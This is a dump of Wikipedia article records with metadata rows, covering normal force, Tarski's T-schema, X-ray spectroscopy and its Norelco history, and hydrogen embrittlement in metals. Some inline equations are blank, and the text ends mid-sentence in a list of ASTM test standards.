Medical laboratory Medical technologist Seroconversion Serovar Geoffrey Tovey, noted serologist References External links Serology (archived) – MedlinePlus Medical Encyclopedia Clinical pathology Blood tests Epidemiology Immunologic tests
Serology
[ "Chemistry", "Biology", "Environmental_science" ]
1,255
[ "Blood tests", "Immunologic tests", "Epidemiology", "Chemical pathology", "Environmental social science" ]
1,063,435
https://en.wikipedia.org/wiki/Normal%20force
In mechanics, the normal force is the component of a contact force that is perpendicular to the surface that an object contacts. In this instance normal is used in the geometric sense and means perpendicular, as opposed to the meaning "ordinary" or "expected". A person standing still on a platform is acted upon by gravity, which would pull them down towards the Earth's core unless there were a countervailing force from the resistance of the platform's molecules, a force which is named the "normal force". The normal force is one type of ground reaction force. If the person stands on a slope and does not sink into the ground or slide downhill, the total ground reaction force can be divided into two components: a normal force perpendicular to the ground and a frictional force parallel to the ground. In another common situation, if an object hits a surface with some speed, and the surface can withstand the impact, the normal force provides for a rapid deceleration, which will depend on the flexibility of the surface and the object. Equations In the case of an object resting upon a flat table (unlike on an incline as in Figures 1 and 2), the normal force on the object is equal but in opposite direction to the gravitational force applied on the object (or the weight of the object), that is, , where m is mass, and g is the gravitational field strength (about 9.81 m/s2 on Earth). The normal force here represents the force applied by the table against the object that prevents it from sinking through the table and requires that the table be sturdy enough to deliver this normal force without breaking. However, it is easy to assume that the normal force and weight are action-reaction force pairs (a common mistake). In this case, the normal force and weight need to be equal in magnitude to explain why there is no upward acceleration of the object. For example, a ball that bounces upwards accelerates upwards because the normal force acting on the ball is larger in magnitude than the weight of the ball. Where an object rests on an incline as in Figures 1 and 2, the normal force is perpendicular to the plane the object rests on. Still, the normal force will be as large as necessary to prevent sinking through the surface, presuming the surface is sturdy enough. The strength of the force can be calculated as: where is the normal force, m is the mass of the object, g is the gravitational field strength, and θ is the angle of the inclined surface measured from the horizontal. The normal force is one of the several forces which act on the object. In the simple situations so far considered, the most important other forces acting on it are friction and the force of gravity. Using vectors In general, the magnitude of the normal force, N, is the projection of the net surface interaction force, T, in the normal direction, n, and so the normal force vector can be found by scaling the normal direction by the net surface interaction force. The surface interaction force, in turn, is equal to the dot product of the unit normal with the Cauchy stress tensor describing the stress state of the surface. That is: or, in indicial notation, The parallel shear component of the contact force is known as the frictional force (). The static coefficient of friction for an object on an inclined plane can be calculated as follows: for an object on the point of sliding where is the angle between the slope and the horizontal. Physical origin Normal force is directly a result of Pauli exclusion principle and not a true force per se: it is a result of the interactions of the electrons at the surfaces of the objects. The atoms in the two surfaces cannot penetrate one another without a large investment of energy because there is no low energy state for which the electron wavefunctions from the two surfaces overlap; thus no microscopic force is needed to prevent this penetration. However these interactions are often modeled as van der Waals force, a force that grows very large very quickly as distance becomes smaller. On the more macroscopic level, such surfaces can be treated as a single object, and two bodies do not penetrate each other due to the stability of matter, which is again a consequence of Pauli exclusion principle, but also of the fundamental forces of nature: cracks in the bodies do not widen due to electromagnetic forces that create the chemical bonds between the atoms; the atoms themselves do not disintegrate because of the electromagnetic forces between the electrons and the nuclei; and the nuclei do not disintegrate due to the nuclear forces. Practical applications In an elevator either stationary or moving at constant velocity, the normal force on the person's feet balances the person's weight. In an elevator that is accelerating upward, the normal force is greater than the person's ground weight and so the person's perceived weight increases (making the person feel heavier). In an elevator that is accelerating downward, the normal force is less than the person's ground weight and so a passenger's perceived weight decreases. If a passenger were to stand on a weighing scale, such as a conventional bathroom scale, while riding the elevator, the scale will be reading the normal force it delivers to the passenger's feet, and will be different than the person's ground weight if the elevator cab is accelerating up or down. The weighing scale measures normal force (which varies as the elevator cab accelerates), not gravitational force (which does not vary as the cab accelerates). When we define upward to be the positive direction, constructing Newton's second law and solving for the normal force on a passenger yields the following equation: In a gravitron amusement ride, the static friction caused by and perpendicular to the normal force acting on the passengers against the walls results in suspension of the passengers above the floor as the ride rotates. In such a scenario, the walls of the ride apply normal force to the passengers in the direction of the center, which is a result of the centripetal force applied to the passengers as the ride rotates. As a result of the normal force experienced by the passengers, the static friction between the passengers and the walls of the ride counteracts the pull of gravity on the passengers, resulting in suspension above ground of the passengers throughout the duration of the ride. When we define the center of the ride to be the positive direction, solving for the normal force on a passenger that is suspended above ground yields the following equation: where is the normal force on the passenger, is the mass of the passenger, is the tangential velocity of the passenger and is the distance of the passenger from the center of the ride. With the normal force known, we can solve for the static coefficient of friction needed to maintain a net force of zero in the vertical direction: where is the static coefficient of friction, and is the gravitational field strength. See also Force Contact mechanics Normal stress References Force Statics
Normal force
[ "Physics", "Mathematics" ]
1,405
[ "Statics", "Force", "Physical quantities", "Quantity", "Mass", "Classical mechanics", "Wikipedia categories named after physical quantities", "Matter" ]
1,063,436
https://en.wikipedia.org/wiki/T-schema
The T-schema ("truth schema", not to be confused with "Convention T") is used to check if an inductive definition of truth is valid, which lies at the heart of any realisation of Alfred Tarski's semantic theory of truth. Some authors refer to it as the "Equivalence Schema", a synonym introduced by Michael Dummett. The T-schema is often expressed in natural language, but it can be formalized in many-sorted predicate logic or modal logic; such a formalisation is called a "T-theory." T-theories form the basis of much fundamental work in philosophical logic, where they are applied in several important controversies in analytic philosophy. As expressed in semi-natural language (where 'S' is the name of the sentence abbreviated to S): 'S' is true if and only if S. Example: 'snow is white' is true if and only if snow is white. The inductive definition By using the schema one can give an inductive definition for the truth of compound sentences. Atomic sentences are assigned truth values disquotationally. For example, the sentence "'Snow is white' is true" becomes materially equivalent with the sentence "snow is white", i.e. 'snow is white' is true if and only if snow is white. Said again, a sentence of the form "A" is true if and only if A is true. The truth of more complex sentences is defined in terms of the components of the sentence: A sentence of the form "A and B" is true if and only if A is true and B is true A sentence of the form "A or B" is true if and only if A is true or B is true A sentence of the form "if A then B" is true if and only if A is false or B is true; see material implication. A sentence of the form "not A" is true if and only if A is false A sentence of the form "for all x, A(x)" is true if and only if, for every possible value of x, A(x) is true. A sentence of the form "for some x, A(x)" is true if and only if, for some possible value of x, A(x) is true. Predicates for truth that meet all of these criteria are called "satisfaction classes", a notion often defined with respect to a fixed language (such as the language of Peano arithmetic); these classes are considered acceptable definitions for the notion of truth. Natural languages Joseph Heath points out that "the analysis of the truth predicate provided by Tarski's Schema T is not capable of handling all occurrences of the truth predicate in natural language. In particular, Schema T treats only "freestanding" uses of the predicate—cases when it is applied to complete sentences." He gives as an "obvious problem" the sentence: Everything that Bill believes is true. Heath argues that analyzing this sentence using T-schema generates the sentence fragment—"everything that Bill believes"—on the righthand side of the logical biconditional. See also Principle of bivalence Law of excluded middle References External links Mathematical logic Philosophical logic Truth Logical expressions
T-schema
[ "Mathematics" ]
681
[ "Mathematical logic", "Logical expressions" ]
1,063,456
https://en.wikipedia.org/wiki/X-ray%20spectroscopy
X-ray spectroscopy is a general term for several spectroscopic techniques for characterization of materials by using x-ray radiation. Characteristic X-ray spectroscopy When an electron from the inner shell of an atom is excited by the energy of a photon, it moves to a higher energy level. When it returns to the low energy level, the energy it previously gained by excitation is emitted as a photon of one of the wavelengths uniquely characteristic of the element. Analysis of the X-ray emission spectrum produces qualitative results about the elemental composition of the specimen. Comparison of the specimen's spectrum with the spectra of samples of known composition produces quantitative results (after some mathematical corrections for absorption, fluorescence and atomic number). Atoms can be excited by a high-energy beam of charged particles such as electrons (in an electron microscope for example), protons (see PIXE) or a beam of X-rays (see X-ray fluorescence, or XRF or also recently in transmission XRT). These methods enable elements from the entire periodic table to be analysed, with the exception of H, He and Li. In electron microscopy an electron beam excites X-rays; there are two main techniques for analysis of spectra of characteristic X-ray radiation: energy-dispersive X-ray spectroscopy (EDS) and wavelength dispersive X-ray spectroscopy (WDS). In X-ray transmission (XRT), the equivalent atomic composition (Zeff) is captured based on photoelectric and Compton effects. Energy-dispersive X-ray spectroscopy In an energy-dispersive X-ray spectrometer, a semiconductor detector measures energy of incoming photons. To maintain detector integrity and resolution it should be cooled with liquid nitrogen or by Peltier cooling. EDS is widely employed in electron microscopes (where imaging rather than spectroscopy is a main task) and in cheaper and/or portable XRF units. Wavelength-dispersive X-ray spectroscopy In a wavelength-dispersive X-ray spectrometer, a single crystal diffracts the photons according to Bragg's law, which are then collected by a detector. By moving the diffraction crystal and detector relative to each other, a wide region of the spectrum can be observed. To observe a large spectral range, three of four different single crystals may be needed. In contrast to EDS, WDS is a method of sequential spectrum acquisition. While WDS is slower than EDS and more sensitive to the positioning of the sample in the spectrometer, it has superior spectral resolution and sensitivity. WDS is widely used in microprobes (where X-ray microanalysis is the main task) and in XRF; it is widely used in the field of X-ray diffraction to calculate various data such as interplanar spacing and wavelength of the incident X-ray using Bragg's law. X-ray emission spectroscopy The father-and-son scientific team of William Lawrence Bragg and William Henry Bragg, who were 1915 Nobel Prize Winners, were the original pioneers in developing X-ray emission spectroscopy. An example of a spectrometer developed by William Henry Bragg, which was used by both father and son to investigate the structure of crystals, can be seen at the Science Museum, London. Jointly they measured the X-ray wavelengths of many elements to high precision, using high-energy electrons as excitation source. The cathode-ray tube or an x-ray tube was the method used to pass electrons through a crystal of numerous elements. They also painstakingly produced numerous diamond-ruled glass diffraction gratings for their spectrometers. The law of diffraction of a crystal is called Bragg's law in their honor. Intense and wavelength-tunable X-rays are now typically generated with synchrotrons. In a material, the X-rays may suffer an energy loss compared to the incoming beam. This energy loss of the re-emerging beam reflects an internal excitation of the atomic system, an X-ray analogue to the well-known Raman spectroscopy that is widely used in the optical region. In the X-ray region there is sufficient energy to probe changes in the electronic state (transitions between orbitals; this is in contrast with the optical region, where the energy emitted or absorbed is often due to changes in the state of the rotational or vibrational degrees of freedom of the system's atoms and groups of atoms). For instance, in the ultra soft X-ray region (below about 1 keV), crystal field excitations give rise to the energy loss. The photon-in-photon-out process may be thought of as a scattering event. When the x-ray energy corresponds to the binding energy of a core-level electron, this scattering process is resonantly enhanced by many orders of magnitude. This type of X-ray emission spectroscopy is often referred to as resonant inelastic X-ray scattering (RIXS). Due to the wide separation of orbital energies of the core levels, it is possible to select a certain atom of interest. The small spatial extent of core level orbitals forces the RIXS process to reflect the electronic structure in close vicinity of the chosen atom. Thus, RIXS experiments give valuable information about the local electronic structure of complex systems, and theoretical calculations are relatively simple to perform. Instrumentation There exist several efficient designs for analyzing an X-ray emission spectrum in the ultra soft X-ray region. The figure of merit for such instruments is the spectral throughput, i.e. the product of detected intensity and spectral resolving power. Usually, it is possible to change these parameters within a certain range while keeping their product constant. Grating spectrometers Usually X-ray diffraction in spectrometers is achieved on crystals, but in Grating spectrometers, the X-rays emerging from a sample must pass a source-defining slit, then optical elements (mirrors and/or gratings) disperse them by diffraction according to their wavelength and, finally, a detector is placed at their focal points. Spherical grating mounts Henry Augustus Rowland (1848–1901) devised an instrument that allowed the use of a single optical element that combines diffraction and focusing: a spherical grating. Reflectivity of X-rays is low, regardless of the used material and therefore, grazing incidence upon the grating is necessary. X-ray beams impinging on a smooth surface at a few degrees glancing angle of incidence undergo external total reflection which is taken advantage of to enhance the instrumental efficiency substantially. Denoted by R the radius of a spherical grating. Imagine a circle with half the radius R tangent to the center of the grating surface. This small circle is called the Rowland circle. If the entrance slit is anywhere on this circle, then a beam passing the slit and striking the grating will be split into a specularly reflected beam, and beams of all diffraction orders, that come into focus at certain points on the same circle. Plane grating mounts Similar to optical spectrometers, a plane grating spectrometer first needs optics that turns the divergent rays emitted by the x-ray source into a parallel beam. This may be achieved by using a parabolic mirror. The parallel rays emerging from this mirror strike a plane grating (with constant groove distance) at the same angle and are diffracted according to their wavelength. A second parabolic mirror then collects the diffracted rays at a certain angle and creates an image on a detector. A spectrum within a certain wavelength range can be recorded simultaneously by using a two-dimensional position-sensitive detector such as a microchannel photomultiplier plate or an X-ray sensitive CCD chip (film plates are also possible to use). Interferometers Instead of using the concept of multiple beam interference that gratings produce, the two rays may simply interfere. By recording the intensity of two such co-linearly at some fixed point and changing their relative phase one obtains an intensity spectrum as a function of path length difference. One can show that this is equivalent to a Fourier transformed spectrum as a function of frequency. The highest recordable frequency of such a spectrum is dependent on the minimum step size chosen in the scan and the frequency resolution (i.e. how well a certain wave can be defined in terms of its frequency) depends on the maximum path length difference achieved. The latter feature allows a much more compact design for achieving high resolution than for a grating spectrometer because x-ray wavelengths are small compared to attainable path length differences. Early history of X-ray spectroscopy in the U.S. Philips Gloeilampen Fabrieken, headquartered in Eindhoven in the Netherlands, got its start as a manufacturer of light bulbs, but quickly evolved until it is now one of the leading manufacturers of electrical apparatus, electronics, and related products including X-ray equipment. It also has had one of the world's largest R&D labs. In 1940, the Netherlands was overrun by Hitler’s Germany. The company was able to transfer a substantial sum of money to a company that it set up as an R&D laboratory in an estate in Irvington on the Hudson in NY. As an extension to their work on light bulbs, the Dutch company had developed a line of X-ray tubes for medical applications that were powered by transformers. These X-ray tubes could also be used in scientific X-ray instrumentations, but there was very little commercial demand for the latter. As a result, management decided to try to develop this market and they set up development groups in their research labs in both Holland and the United States. They hired Dr. Ira Duffendack, a professor at University of Michigan and a world expert on infrared research to head the lab and to hire a staff. In 1951 he hired Dr. David Miller as Assistant Director of Research. Dr. Miller had done research on X-ray instrumentation at Washington University in St. Louis. Dr. Duffendack also hired Dr. Bill Parish, a well known researcher in X-ray diffraction, to head up the section of the lab on X-ray instrumental development. X-ray diffraction units were widely used in academic research departments to do crystal analysis. An essential component of a diffraction unit was a very accurate angle measuring device known as a goniometer. Such units were not commercially available, so each investigator had do try to make their own. Dr Parrish decided this would be a good device to use to generate an instrumental market, so his group designed and learned how to manufacture a goniometer. This market developed quickly and, with the readily available tubes and power supplies, a complete diffraction unit was made available and was successfully marketed. The U.S. management did not want the laboratory to be converted to a manufacturing unit so it decided to set up a commercial unit to further develop the X-ray instrumentation market. In 1953 Norelco Electronics was established in Mount Vernon, NY, dedicated to the sale and support of X-ray instrumentation. It included a sales staff, a manufacturing group, an engineering department and an applications lab. Dr. Miller was transferred from the lab to head up the engineering department. The sales staff sponsored three schools a year, one in Mount Vernon, one in Denver, and one in San Francisco. The week-long school curricula reviewed the basics of X-ray instrumentation and the specific application of Norelco products. The faculty were members of the engineering department and academic consultants. The schools were well attended by academic and industrial R&D scientists. The engineering department was also a new product development group. It added an X-ray spectrograph to the product line very quickly and contributed other related products for the next 8 years. The applications lab was an essential sales tool. When the spectrograph was introduced as a quick and accurate analytical chemistry device, it was met with widespread skepticism. All research facilities had a chemistry department and analytical analysis was done by “wet chemistry” methods. The idea of doing this analysis by physics instrumentation was considered suspect. To overcome this bias, the salesman would ask a prospective customer for a task the customer was doing by “wet methods”. The task would be given to the applications lab and they would demonstrate how accurately and quickly it could be done using the X-ray units. This proved to be a very strong sales tool, particularly when the results were published in the Norelco Reporter, a technical journal issued monthly by the company with wide distribution to commercial and academic institutions. An X-ray spectrograph consists of a high voltage power supply (50 kV or 100 kV), a broad band X-ray tube, usually with a tungsten anode and a beryllium window, a specimen holder, an analyzing crystal, a goniometer, and an X-ray detector device. These are arranged as shown in Fig. 1. The continuous X-spectrum emitted from the tube irradiates the specimen and excites the characteristic spectral X-ray lines in the specimen. Each of the 92 elements emits a characteristic spectrum. Unlike the optical spectrum, the X-ray spectrum is quite simple. The strongest line, usually the Kalpha line, but sometimes the Lalpha line, suffices to identify the element. The existence of a particular line betrays the existence of an element, and the intensity is proportional to the amount of the particular element in the specimen. The characteristic lines are reflected from a crystal, the analyzer, under an angle that is given by the Bragg condition. The crystal samples all the diffraction angles theta by rotation, while the detector rotates over the corresponding angle 2-theta. With a sensitive detector, the X-ray photons are counted individually. By stepping the detectors along the angle, and leaving it in position for a known time, the number of counts at each angular position gives the line intensity. These counts may be plotted on a curve by an appropriate display unit. The characteristic X-rays come out at specific angles, and since the angular position for every X-ray spectral line is known and recorded, it is easy to find the sample's composition. A chart for a scan of a Molybdenum specimen is shown in Fig. 2. The tall peak on the left side is the characteristic alpha line at a two theta of 12 degrees. Second and third order lines also appear. Since the alpha line is often the only line of interest in many industrial applications, the final device in the Norelco X- ray spectrographic instrument line was the Autrometer. This device could be programmed to automatically read at any desired two theta angle for any desired time interval. Soon after the Autrometer was introduced, Philips decided to stop marketing X-ray instruments developed in both the U.S. and Europe and settled on offering only the Eindhoven line of instruments. In 1961, during the development of the Autrometer, Norelco was given a sub-contract from the Jet Propulsion Lab. The Lab was working on the instrument package for the Surveyor spaceship. The composition of the Moon’s surface was of major interest and the use of an X-ray detection instrument was viewed as a possible solution. Working with a power limit of 30 watts was very challenging, and a device was delivered but it wasn’t used. Later NASA developments did lead to an X-ray spectrographic unit that did make the desired moon soil analysis. The Norelco efforts faded but the use of X-ray spectroscopy in units known as XRF instruments continued to grow. With a boost from NASA, units were finally reduced to handheld size and are seeing widespread use. Units are available from Bruker, Thermo Scientific, Elvatech Ltd. and SPECTRA. Other types of X-ray spectroscopy X-ray absorption spectroscopy X-ray magnetic circular dichroism See also Auger electron spectroscopy X-Ray Spectrometry (journal) New perspectives of explosive detection based on CdTe/CDZnTe spectrometric detectors References
X-ray spectroscopy
[ "Physics", "Chemistry" ]
3,310
[ "X-ray spectroscopy", "Spectroscopy", "Spectrum (physical sciences)" ]
1,063,470
https://en.wikipedia.org/wiki/Hydrogen%20embrittlement
Hydrogen embrittlement (HE), also known as hydrogen-assisted cracking or hydrogen-induced cracking (HIC), is a reduction in the ductility of a metal due to absorbed hydrogen. Hydrogen atoms are small and can permeate solid metals. Once absorbed, hydrogen lowers the stress required for cracks in the metal to initiate and propagate, resulting in embrittlement. Hydrogen embrittlement occurs in steels, as well as in iron, nickel, titanium, cobalt, and their alloys. Copper, aluminium, and stainless steels are less susceptible to hydrogen embrittlement. The essential facts about the nature of hydrogen embrittlement have been known since the 19th century. Hydrogen embrittlement is maximised at around room temperature in steels, and most metals are relatively immune to hydrogen embrittlement at temperatures above 150 °C. Hydrogen embrittlement requires the presence of both atomic ("diffusible") hydrogen and a mechanical stress to induce crack growth, although that stress may be applied or residual. Hydrogen embrittlement increases at lower strain rates. In general, higher-strength steels are more susceptible to hydrogen embrittlement than mid-strength steels. Metals can be exposed to hydrogen from two types of sources: gaseous hydrogen and hydrogen chemically generated at the metal surface. Gaseous hydrogen is molecular hydrogen and does not cause embrittlement, though it can cause a hot hydrogen attack (see below). It is the atomic hydrogen from a chemical attack which causes embrittlement because the atomic hydrogen dissolves quickly into the metal at room temperature. Gaseous hydrogen is found in pressure vessels and pipelines. Electrochemical sources of hydrogen include acids (as may be encountered during pickling, etching, or cleaning), corrosion (typically due to aqueous corrosion or cathodic protection), and electroplating. Hydrogen can be introduced into the metal during manufacturing by the presence of moisture during welding or while the metal is molten. The most common causes of failure in practice are poorly controlled electroplating or damp welding rods. Hydrogen embrittlement as a term can be used to refer specifically to the embrittlement that occurs in steels and similar metals at relatively low hydrogen concentrations, or it can be used to encompass all embrittling effects that hydrogen has on metals. These broader embrittling effects include hydride formation, which occurs in titanium and vanadium but not in steels, and hydrogen-induced blistering, which only occurs at high hydrogen concentrations and does not require the presence of stress. However, hydrogen embrittlement is almost always distinguished from high temperature hydrogen attack (HTHA), which occurs in steels at temperatures above 204 °C and involves the formation of methane pockets. The mechanisms (there are many) by which hydrogen causes embrittlement in steels are not comprehensively understood and continue to be explored and studied. Mechanisms Hydrogen embrittlement is a complex process involving a number of distinct contributing micro-mechanisms, not all of which need to be present. The mechanisms include the formation of brittle hydrides, the creation of voids that can lead to high-pressure bubbles, enhanced decohesion at internal surfaces and localised plasticity at crack tips that assist in the propagation of cracks. There is a great variety of mechanisms that have been proposed and investigated as to the cause of brittleness once diffusible hydrogen has been dissolved into the metal. In recent years, it has become widely accepted that HE is a complex process dependent on material and environment so that no single mechanism applies exclusively. Internal pressure: At high hydrogen concentrations, absorbed hydrogen species recombine in voids to form hydrogen molecules (H2), creating pressure from within the metal. This pressure can increase to levels where cracks form, commonly designated hydrogen-induced cracking (HIC), as well as blisters forming on the specimen surface, designated hydrogen-induced blistering. These effects can reduce ductility and tensile strength. Hydrogen enhanced localised plasticity (HELP): Hydrogen increases the nucleation and movement of dislocations at a crack tip. HELP results in crack propagation by localised ductile failure at the crack tip with less deformation occurring in the surrounding material, which gives a brittle appearance to the fracture. Hydrogen decreased dislocation emission: Molecular dynamics simulations reveal a ductile-to-brittle transition caused by the suppression of dislocation emission at the crack tip by dissolved hydrogen. This prevents the crack tip rounding-off, so the sharp crack then leads to brittle-cleavage failure. Hydrogen enhanced decohesion (HEDE): Interstitial hydrogen lowers the stress required for metal atoms to fracture apart. HEDE can only occur when the local concentration of hydrogen is high, such as due to the increased hydrogen solubility in the tensile stress field at a crack tip, at stress concentrators, or in the tension field of edge dislocations. Metal hydride formation: The formation of brittle hydrides with the parent material allows cracks to propagate in a brittle fashion. This is particularly a problem with vanadium alloys, while most other structural alloys do not easily form hydrides. Phase transformations: Hydrogen can induce phase transformations in some materials, and the new phase may be less ductile. Material susceptibility Hydrogen embrittles a variety of metals including steel, aluminium (at high temperatures only), and titanium. Austempered iron is also susceptible, though austempered steel (and possibly other austempered metals) displays increased resistance to hydrogen embrittlement. NASA has reviewed which metals are susceptible to embrittlement and which only prone to hot hydrogen attack: nickel alloys, austenitic stainless steels, aluminium and alloys, copper (including alloys, e.g. beryllium copper). Sandia has also produced a comprehensive guide. Steels Steel with an ultimate tensile strength of less than 1000 MPa (~145,000 psi) or hardness of less than HRC 32 on the Hardness Rockwell Scale is not generally considered susceptible to hydrogen embrittlement. As an example of severe hydrogen embrittlement, the elongation at failure of 17-4PH precipitation hardened stainless steel was measured to drop from 17% to only 1.7% when smooth specimens were exposed to high-pressure hydrogen As the strength of steels increases, the fracture toughness decreases, so the likelihood that hydrogen embrittlement will lead to fracture increases. In high-strength steels, anything above a hardness of HRC 32 may be susceptible to early hydrogen cracking after plating processes that introduce hydrogen. They may also experience long-term failures any time from weeks to decades after being placed in service due to accumulation of hydrogen over time from cathodic protection and other sources. Numerous failures have been reported in the hardness range from HRC 32-36 and above; therefore, parts in this range should be checked during quality control to ensure they are not susceptible. Testing the fracture toughness of hydrogen-charged, embrittled specimens is complicated by the need to keep charged specimens very cold, in liquid nitrogen, to prevent the hydrogen diffusing away. Copper Copper alloys which contain oxygen can be embrittled if exposed to hot hydrogen. The hydrogen diffuses through the copper and reacts with inclusions of , forming 2 metallic Cu atoms and (water), which then forms pressurized bubbles at the grain boundaries. This process can cause the grains to be forced away from each other, and is known as steam embrittlement (because steam is directly produced inside the copper crystal lattice, not because exposure of copper to external steam causes the problem). Vanadium, nickel, and titanium Alloys of vanadium, nickel, and titanium have a high hydrogen solubility, and can therefore absorb significant amounts of hydrogen. This can lead to hydride formation, resulting in irregular volume expansion and reduced ductility (because metallic hydrides are fragile ceramic materials). This is a particular issue when looking for non-palladium-based alloys for use in hydrogen separation membranes. Fatigue While most failures in practice have been through fast failure, there is experimental evidence that hydrogen also affects the fatigue properties of steels. This is entirely expected given the nature of the embrittlement mechanisms proposed for fast fracture. In general hydrogen embrittlement has a strong effect on high-stress, low-cycle fatigue and very little effect on high-cycle fatigue. Environmental embrittlement Hydrogen embrittlement is a volume effect: it affects the volume of the material. Environmental embrittlement is a surface effect where molecules from the atmosphere surrounding the material under test are adsorbed onto the fresh crack surface. This is most clearly seen from fatigue measurements where the measured crack growth rates can be an order of magnitude higher in hydrogen than in air. That this effect is due to adsorption, which saturates when the crack surface is completely covered, is understood from the weak dependence of the effect on the pressure of hydrogen. Environmental embrittlement is also observed to reduce fracture toughness in fast fracture tests, but the severity is much reduced compared with the same effect in fatigue. Hydrogen embrittlement occurs when a previously embrittled material has low fracture toughness regardless of the atmosphere in which it is tested. Environmental embrittlement occurs when the low fracture toughness is only observed in that atmosphere. Sources of hydrogen During manufacture, hydrogen can be dissolved into the component by processes such as phosphating, pickling, electroplating, casting, carbonizing, surface cleaning, electrochemical machining, welding, hot roll forming, and heat treatments. During service use, hydrogen can be dissolved into the metal from wet corrosion or through misapplication of protection measures such as cathodic protection. In one case of failure during construction of the San Francisco–Oakland Bay Bridge galvanized (i.e. zinc-plated) rods were left wet for 5 years before being tensioned. The reaction of the zinc with water introduced hydrogen into the steel. A common case of embrittlement during manufacture is poor arc welding practice, in which hydrogen is released from moisture, such as in the coating of welding electrodes or from damp welding rods. To avoid atomic hydrogen formation in the high temperature plasma of the arc, welding rods have to be perfectly dried in an oven at the appropriate temperature and duration before use. Another way to minimize the formation of hydrogen is to use special low-hydrogen electrodes for welding high-strength steels. Apart from arc welding, the most common problems are from chemical or electrochemical processes which, by reduction of hydrogen ions or water, generate hydrogen atoms at the surface, which rapidly dissolve in the metal. One of these chemical reactions involves hydrogen sulfide () in sulfide stress cracking (SSC), a significant problem for the oil and gas industries. After a manufacturing process or treatment which may cause hydrogen ingress, the component should be baked to remove or immobilize the hydrogen. Prevention Hydrogen embrittlement can be prevented through several methods, all of which are centered on minimizing contact between the metal and hydrogen, particularly during fabrication and the electrolysis of water. Embrittling procedures such as acid pickling should be avoided, as should increased contact with elements such as sulfur and phosphate. If the metal has not yet started to crack, hydrogen embrittlement can be reversed by removing the hydrogen source and causing the hydrogen within the metal to diffuse out through heat treatment. This de-embrittlement process, known as low hydrogen annealing or "baking", is used to overcome the weaknesses of methods such as electroplating which introduce hydrogen to the metal, but is not always entirely effective because a sufficient time and temperature must be reached. Tests such as ASTM F1624 can be used to rapidly identify the minimum baking time (by testing using careful design of experiments, a relatively low number of samples can be used to pinpoint this value). Then the same test can be used as a quality control check to evaluate if baking was sufficient on a per-batch basis. In the case of welding, often pre-heating and post-heating the metal is applied to allow the hydrogen to diffuse out before it can cause any damage. This is specifically done with high-strength steels and low alloy steels such as the chromium/molybdenum/vanadium alloys. Due to the time needed to re-combine hydrogen atoms into the hydrogen molecules, hydrogen cracking due to welding can occur over 24 hours after the welding operation is completed. Another way of preventing this problem is through materials selection. This will build an inherent resistance to this process and reduce the need for post-processing or constant monitoring for failure. Certain metals or alloys are highly susceptible to this issue, so choosing a material that is minimally affected while retaining the desired properties would also provide an optimal solution. Much research has been done to catalogue the compatibility of certain metals with hydrogen. Tests such as ASTM F1624 can also be used to rank alloys and coatings during materials selection to ensure (for instance) that the threshold of cracking is below the threshold for hydrogen-assisted stress corrosion cracking. Similar tests can also be used during quality control to more effectively qualify materials being produced in a rapid and comparable manner. Surface coatings Coatings act as a barrier between the metal substrate and the surrounding environment, hindering the ingress of hydrogen atoms. Various techniques can be used to apply coatings, such as electroplating, chemical conversion coatings, or organic coatings. The choice of coating depends on factors such as the type of metal, the operating environment, and the specific requirements of the application. Electroplating is a commonly used method to deposit a protective layer onto the metal surface. This process involves immersing the metal substrate into an electrolyte solution containing metal ions. By applying an electric current, the metal ions are reduced and form a metallic coating on the substrate. Electroplating can provide an excellent protective layer that enhances corrosion resistance and reduces the susceptibility to hydrogen embrittlement. Chemical conversion coatings are another effective method for surface protection. These coatings are typically formed through chemical reactions between the metal substrate and a chemical solution. The conversion coating chemically reacts with the metal surface, resulting in a thin, tightly adhering protective layer. Examples of conversion coatings include chromate, phosphate, and oxide coatings. These coatings not only provide a barrier against hydrogen diffusion but also enhance the metal's corrosion resistance. Organic coatings, such as paints or polymer coatings, offer additional protection against hydrogen embrittlement. These coatings form a physical barrier between the metal surface and the environment. They provide excellent adhesion, flexibility, and resistance to environmental factors. Organic coatings can be applied through various methods, including spray coating, dip coating, or powder coating. They can be formulated with additives to further enhance their resistance to hydrogen ingress. Thermally sprayed coatings offer several advantages in the context of hydrogen embrittlement prevention. The coating materials used in this process are often composed of materials with excellent resistance to hydrogen diffusion, such as ceramics or cermet alloys. These materials have a low permeability to hydrogen, creating a robust barrier against hydrogen ingress into the metal substrate. Testing Most analytical methods for hydrogen embrittlement involve evaluating the effects of (1) internal hydrogen from production and/or (2) external sources of hydrogen such as cathodic protection. For steels, it is important to test specimens in the lab that are at least as hard (or harder) as the final parts will be. Ideally, specimens should be made of the final material or the nearest possible representative, as fabrication can have a profound impact on resistance to hydrogen-assisted cracking. There are numerous ASTM standards for testing for hydrogen embrittlement: ASTM B577 is the Standard Test Methods for Detection of Cuprous Oxide (Hydrogen Embrittlement Susceptibility) in Copper. The test focuses on hydrogen embrittlement of copper alloys, including a metallographic evaluation (method A), testing in a hydrogen charged chamber followed by metallography (method B), and method C is the same as B but includes a bend test. ASTM B839 is the Standard Test Method for Residual Embrittlement in Metallic Coated, Externally Threaded Articles, Fasteners, and Rod-Inclined Wedge Method. ASTM F519 is the Standard Test Method for Mechanical Hydrogen Embrittlement Evaluation of Plating/Coating Processes and Service Environments. There are 7 different samples designs and the two most commons tests are (1) the rapid test, the Rising step load testing (RSL) method per ASTM F1624 and (2) the sustained load test, which takes 200 hours. The sustained load test is still included in many legacy standards, but the RSL method is increasingly being adopted due to speed, repeatability, and the quantitative nature of the test. The RSL method provides an accurate ranking of the effect of hydrogen from both internal and external sources. ASTM F1459 is the Standard Test Method for Determination of the Susceptibility of Metallic Materials to Hydrogen Gas Embrittlement (HGE) Test. The test uses a diaphragm loaded with a differential pressure. ASTM G142 is the Standard Test Method for Determination of Susceptibility of Metals to Embrittlement in Hydrogen Containing Environments at High Pressure, High Temperature, or Both. The test uses a cylindrical tensile specimen tested into an enclosure pressurized with hydrogen or helium. ASTM F1624 is the Standard Test Method for Measurement of Hydrogen Embrittlement Threshold in Steel by the Incremental Step Loading Technique. The test uses the incremental step loading (ISL) or Rising step load testing (RSL) method for quantitatively testing for the Hydrogen Embrittlement threshold stress for the onset of Hydrogen-Induced Cracking due to platings and coatings from Internal Hydrogen Embrittlement (IHE) and Environmental Hydrogen Embrittlement (EHE). F1624 provides a rapid, quantitative measure of the effects of hydrogen both from internal sources and external sources (which is accomplished by applying a selected voltage in an electrochemical cell). The F1624 test is performed by comparing a standard fast-fracture tensile strength to the fracture strength from a Rising step load testing practice where the load is held for hour(s) at each step. In many cases, it can be performed in 30 hours or less. ASTM F1940 is the Standard Test Method for Process Control Verification to Prevent Hydrogen Embrittlement in 